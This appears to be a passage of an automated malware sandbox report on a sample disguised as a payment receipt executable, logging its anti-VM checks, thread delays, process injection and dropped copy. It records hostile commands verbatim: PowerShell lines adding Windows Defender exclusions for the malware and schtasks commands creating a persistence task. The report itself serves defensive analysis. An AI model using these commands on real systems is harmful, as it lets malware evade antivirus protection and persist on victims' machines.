Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100, type: MEMORYSTR

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory allocated: DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory allocated: 8A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory allocated: 9A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory allocated: 9C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory allocated: AC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory allocated: 12F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory allocated: 2E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory allocated: 8B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory allocated: 9B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory allocated: 9CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory allocated: ACF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6223	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8354	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1227	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe TID: 1136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6496	Thread sleep count: 6223 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036	Thread sleep count: 281 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe TID: 7212	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe TID: 7284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 0000000A.00000002.3429388414.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, euKeoTytdT.exe, 00000011.00000002.2265870923.0000000001208000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

Code function: 17_2_0040317B mov eax, dword ptr fs:[00000030h]

17_2_0040317B

Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe

Code function: 17_2_00402B7C GetProcessHeap,HeapAlloc,

17_2_00402B7C

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Memory written: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Memory written: C:\Users\user\AppData\Roaming\euKeoTytdT.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Process created: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp707F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Process created: C:\Users\user\AppData\Roaming\euKeoTytdT.exe "C:\Users\user\AppData\Roaming\euKeoTytdT.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Queries volume information: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
